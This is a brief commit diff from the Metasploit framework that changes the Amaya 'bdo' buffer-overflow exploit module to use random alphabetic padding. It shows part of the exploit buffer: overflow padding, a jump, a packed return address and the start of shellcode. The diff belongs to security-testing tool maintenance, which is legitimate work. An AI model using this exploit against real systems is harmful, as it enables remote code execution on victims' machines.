Land #2960, rand_text_alpha for amaya_bdo
commit
e6905837eb
|
@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Set the exploit buffer
|
||||
sploit = "<bdo dir=\""
|
||||
sploit += "\x41" * 6889
|
||||
sploit += rand_text_alpha(6889)
|
||||
sploit += "\x74\x06\x41\x41"
|
||||
sploit += [target.ret].pack('V')
|
||||
sploit += "\x68\x7f\x01\x01\x7f" # push 7F01017F
|
||||
|
|
Loading…
Reference in New Issue